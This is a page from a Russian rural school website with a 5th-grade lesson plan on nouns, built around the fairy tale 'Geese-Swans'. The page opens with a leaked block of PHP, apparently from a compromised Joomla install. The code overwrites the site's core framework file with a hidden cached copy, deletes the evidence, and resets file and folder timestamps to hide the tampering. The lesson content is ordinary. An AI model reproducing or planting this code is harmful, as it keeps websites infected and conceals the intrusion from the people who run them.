$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Урок русского языка в 5 классе "Имя существительное"

Сайт Сагарчинской средней школы

Будущее начинается здесь и сейчас!

ВХОД



Календарь



Опрос

Интересно ли Вам на этом сайте?
 

Статистика

Пользователи : 6
Статьи : 290
Просмотры материалов : 210460

На сайте

Сейчас 90 гостей онлайн

Вход в электронный дневник

Баннер

Вход в систему "Госуслуги"

Баннер

Персональные данные Дети

Баннер

Урок русского языка в 5 классе "Имя существительное"


Учитель русского языка и литературы МБОУ «Сагарчинская средняя общеобразовательная школа Акбулакского района Оренбургской области»,

I квалификационной категории

Аманжулова Айман Данибековна.

Урок русского языка в 5 классе.

(СКАЧАТЬ приложение к уроку)

Тема: Имя существительное

Тип урока: Урок закрепления знаний, выработки умений и навыков.

Цель  урока: обобщить знания, закрепить навыки и умения.

Задачи: закрепление пройденного материала; формирование навыков работы в парах, развитие устной и письменной речи, развитие общекультурных, общеучебных,  познавательных, информационно-коммуникативных  компетенций.

Форма урока: Урок закрепления знаний, выработки умений и навыков.

Оборудование: проектор, презентация, интерактивная физминутка, рабочие листы урока, ноутбук, карточки, солнышко, магниты.

Ход урока.

I .Организационный момент. Психологический настрой. (3 мин.):

Учитель Здравствуйте, ребята! Ребята, нам предстоит выполнить на уроке большой объем работы. Работать индивидуально и в парах. Очень важно начать такую работу с хорошего настроения. Я предлагаю вам посмотреть видеоролик «Улыбнись!» И пусть у вас все получится!

Видеоролик «Улыбнись!»(2 мин)

II. Введение в тему урока

Учитель Тема нашего урока прячется в стихотворении, которое я вам сейчас прочитаю.

Вещи, люди и цветы,

Носороги и коты,

Джинсы, майки и штиблеты

Называются …..(ПРЕДМЕТЫ).

Шубы, шапки и зонты,

Гвозди, гайки и винты,

Сёла, города, планеты -

Это тоже всё …(ПРЕДМЕТЫ! )

Ах, какие все слова восхитительные,

Называются они …(СУЩЕСТВИТЕЛЬНЫЕ !!!)

Учитель Откройте тетради, запишите число, тему урока

Сегодня проведём – урок-сказку. Все вы с младших классов знаете сказку “Гуси-лебеди”. СЛАЙД 1

Попробуем вспомнить, с кем встречалась Машенька на своем пути?

(Дети перечисляют: печь, молочная река, яблоня, избушка с Бабой-Ягой )

Учитель. Правильно, ребята, и сегодня по очереди герои сказки придут к нам в гости. Но придут они не с пустыми руками. У каждого из них будут различные задания. Только выполнив их, вы сможете помочь Маше избежать опасности, продолжить путь дальше и найти братца.

Ведь в каждой сказке побеждает ЧТО?

(Дети хором: “Дружба и добро!”)

Дорога наша тайн полна,
Но будет долгою она
Для тех, кто правил не учил,
Кто их читал, но всё забыл…
Надеюсь, нет таких у нас? (Ответ ребят)
Ну что ж, ребята, в добрый час!

Учитель. Итак, дети, в добрый путь!

Звучит музыка из “Напутственной песни” Г.Гладкова

Учитель

Открываем Двери в сказку, чтоб не потеряться,
Вы должны всегда, ребята, за руки держаться.
Только дружная команда справится с заданием.
Мы смекалки и удачи всем здесь пожелаем.

Учитель. Жили мужик да баба. У них была дочка да сыночек маленький.

Слайд 2(речь матери)

Учитель. Доченька, — говорила мать, — мы пойдем на работу, береги братца! Не ходи со двора, будь умницей — мы купим тебе платочек.

Отец с матерью ушли, а дочка позабыла, что ей приказывали: посадила братца на травку под окошко, а сама побежала на улицу гулять. Налетели гуси-лебеди, подхватили мальчика, унесли на крыльях.

Слайд 3(полет гусей)

Вернулась девочка, смотрит – а братца нет. Выбежала она в чистое поле и только увидела: метнулись вдалеке гуси-лебеди и пропали за темным лесом.

Слайд 4

Бросилась девочка догонять их. Бежала, бежала и увидела печь.

Слайд5 (печка)

— Печка, печка, скажи, куда гуси-лебеди полетели?

Печка ей отвечает:

—Выполни мои задания — скажу.

- Ребята, давайте поможем Машеньке.

Задания от печки

ЗАДАНИЕ 1 Вставить пропущенные слова (устно)

СЛАЙД 6

а) Часть речи, которая обозначает …( предмет) и отвечает на вопросы… (кто ? что?) называется существительным

2) Имя существительное имеет грамматические признаки… (склонение,род, число, падеж).

3) Имя существительное изменяется ….по.(падежам и числам)

3) Чаще всего имя существительное в предложении бывает …..(подлежащим, дополнением или обстоятельством)

ЗАДАНИЕ 2 ( карточка№1 )

Какое утверждение является верным , ответить «да» +, «нет» -

1) имена существительные могут обозначать названия предметов окружающего мира, явлений природы, географические названия +

2)В русском языке выделяется группа существительных общего рода. +

3) Неодушевленные имена существительные отвечают на вопрос кто? –

4) Склонение сущ. определяется по именительному падежу, единственному числу. +

5) Существительное может быть в форме единственного и множественного числа +

6) В русском языке имена сущ. по родам не изменяются

7) Род и склонение являются постоянными признаками существительных +

8) Несклоняемые существительные не имеют рода

Учитель Проверим, ответы на экране.

СЛАЙД 8

Учитель У кого утверждения не совпадают? Почему?(ответы детей)

Учитель Печка указала дорогу Маше. Побежала девочка дальше — стоит яблоня.

СЛАЙД 9,10

— Яблоня, яблоня, скажи, куда гуси-лебеди полетели?

— Выполни мои задания — скажу.

Ребята, поможем Машеньке?

Задание № 1.. Вставьте пропущенные буквы, объясните ( карточка №2, один у доски).

СЛАЙД 11

Р…са, ц…ркуль, д…брота, б…рёза, ш…рох, в…юга, праз…ник, изл..жение, под…рок, с улиц…, н…ра, дер…во, грач.., ч…ловек, зар…сли.

Проверка СЛАЙД 12

Задание 2. Определите род данных существительных

Разделите эти же слова на одушевлённые и неодушевлённые (карточка №3 выполняют задание в тетради)

СЛАЙД 13

I вариант

II вариант

Берёза, трава, крыло, брат,

Липа, яблоко, женщина, мышка,

берег, мужик, река, пирог, мать.

улица, поле, лес, песня, девочка.

Учитель: Как определить род существительного?

3) Это задание не вызвало особых затруднений. Но есть такие имена существительные, род которых определить трудно. Составить словосочетания сущ. + прилаг.

СЛАЙД 14

Рояль, вестибюль, фойе, кофе, простыня, тюль

.( Белый рояль, красивый вестибюль, украшенное фойе, растворимый кофе, цветная простыня, вышитый тюль.)

СЛАЙД 15
Слайд (напутствие яблони)

Яблоня показала дорогу Маше и она побежала дальше!

ФИЗМИНУТКА

Учитель Вот пора и отдохнуть,
Труден очень был наш путь.

И сейчас все по порядку
Встанем дружно на зарядку

СУПЕР ФИЗМИНУТКА

Учитель Ну, ребята, как вам путь?
Вы успели отдохнуть?

Путь нам надо продолжать.
Впереди у нас река,
Широка и глубока,
Чтобы реку переплыть,
Нам дружнее надо быть.
Если мы смекалку, ум отгоним,
Тотчас вместе все потонем.

Итак, побежала Маша дальше, стоит молочная речка, кисельные берега.

Слайд 17,18 речка

—  Молочная речка, кисельные берега, куда гуси по­летели?

—  Выполни мои задания,— скажу.

Давайте, ребята, поможем Машеньке

Учитель.

Ну, посмотрим, что нас ждёт?
Первым кто из нас пройдёт?
Кто быстрее всех прочтёт,
Слово лишнее найдёт.

Задание № 1 - СЛАЙД 19

Ножницы, дрожжи, щипцы, башмаки
2. Урал, река, Мария, Оренбург
3. Знамя, время, аллея, пламя
4. Обжора, рёва, мальчик, разиня.

Учитель Почему «лишнее»?

Ножницы, дрожжи, щипцы – не имеют единственного числа башмаки – может быть в форме ед и мн числа

Река – т.к. нарицательное сущ.

Аллея – относится к 1 склонению, остальные- разносклоняемые (бремя, время, вымя, знамя, имя, пламя, племя, стремя, темя- ср рода и путь)

Мальчик- сущ муж рода, остальные общего рода

Задание №2. (Карточка №4)

Учитель Внимательно посмотрите на задания. Какое правило мы должны с вами вспомнить? (употребление суффиксов сущ –ек, -ик (чик) и чик-щик)

Чтобы узнать, какой суффикс пишется в слове, нужно просклонять это существительное. Если гласный выпадает, пишется- ек, если гласный сохраняется, то пишется –ик

после букв т-д, с-з,ж пишется- чик, в остальных случаях –щик)

1 вариант Вставь пропущенные буквы, объяснив, какой суффикс нужно написать:

Спи, мой воробыш..к, спи, мой сыноч..к, спи, мой звоноч..к родной. (М. Исаковский.) На Первый пост в наряд охранный идет солдат..к молодой. (М. Лисянский.) Ах ты, девочка чумазая, где ты нос..к так измазала? (А. Барто.) Я принес с собой ароматный комоч..к сосновой смолы, дал понюхать девочке и сказал, что этой смолой деревья лечатся. (М. Пришвин.) Нам открыл худенький человеч..к в поношенном пиджаке. (К. Паустовский.) Сердцу снится душистый горош..к, и звенит голубая звезда. (С. Есенин.

(изменить слово, если гласный суффикса выпадает, пишется –ек)

2 вариант Запишите предложения, объяснив, какой суффикс нужно написать:

Поехал я в должности груз..ка доставать для колхоза запчасти. (В. Солоухин.) Это был худенький юноша – выдум..ик и спор..ик. (К. Паустовский.) Во всяком деле впереди развед..ик. Навод..ик глазом припал к дальномеру. (В. Катаев.) Итак, мы ехали в Новый Афон с попут..иками. (К. Паустовский.) Сплав..ики ушли работать рано утром. (В. Астафьев.) В Новоселках бакен..ик перевез меня на этот берег Оки и чуть не утопил. (К. Паустовский.) ( после букв т-д, с-з,ж пишется- чик, в остальных случаях –щик)

Учитель А теперь обменяйтесь карточками и проверьте друг друга (взаимопроверка)

Учитель Речка указала дорогу. Маша побежала дальше

СЛАЙД20,21

Учитель. Долго она бегала по полям, лесам. День клонился к вечеру, делать нечего – надо идти домой. Вдруг видит избушка на курьей ножке, с одним окошком, кругом себя поворачивается.

СЛАЙД 22

В избушке сидит баба-яга, сидит и братец на лавочке, играет золотыми яблочками. Увидела Баба-Яга Машу и говорит:

- Выполнишь мои задания, отпущу братца.

Ребята, поможем Машеньке.

Задание № 1. Вспомните правило и запишите пропущенные буквы (устно)

СЛАЙД23,24

Помогать подруг.., радоваться удач.., обрадоваться новост.., ветка сирен.., вершина ёлк.., ошибка в изложении…, песня о счасть…, рассказ о путешестви…,

вытащить из проруб…, изменения в расписани…, написать в альбом…, нет времен…

- Скажите, какие окончания имеют эти существительные в форме родительного, дательного и предложного падежа?

Задание № 2. - Скажите, ребята, а что мы называем склонением?

(Изменение сущ. по падежам и числам)
- Сколько падежей в русском языке? Назовите их и вопросы, на которые они отвечают

- А теперь проверим, как вы умеете определять падежи!

Я читаю стихотворение, вы выписываете из него только слово дорожка и определяете, в каком падеже стоит это слово.

Дорожка домой

Мне мила с детских лет,

Дорожки знакомей, красивее нет!

И если б зашёл я,

Не знаю куда,

Дорожку домой

Отыскал бы всегда

На этой дорожке

И в трудные дни

Я пел бы без устали

Песни свои

Отпустила Баба-Яга девочку с братиком

СЛАЙД25,26

Учитель. Маша вместе с братом прибежала домой

СЛАЙД 27, да хорошо еще, что успела прибежать, а тут и отец и мать пришли. Вот мы и дошли до конца сказки. Молодцы, ребята!

(Слайд со словом “МОЛОДЦЫ!”.)

Итог урока

Учитель Скажите, какие орфографические правила нам пришлось вспомнить

Рефлексия «Солнышко»

На доске прикреплён круг от солнышка, детям раздаются лучики жёлтого и голубого цветов. Лучики нужно прикрепить к солнышку: желтого цвета – мне очень понравилось занятие, получили много интересной информации; голубого цвета – занятие не интересное, не было никакой полезной информации.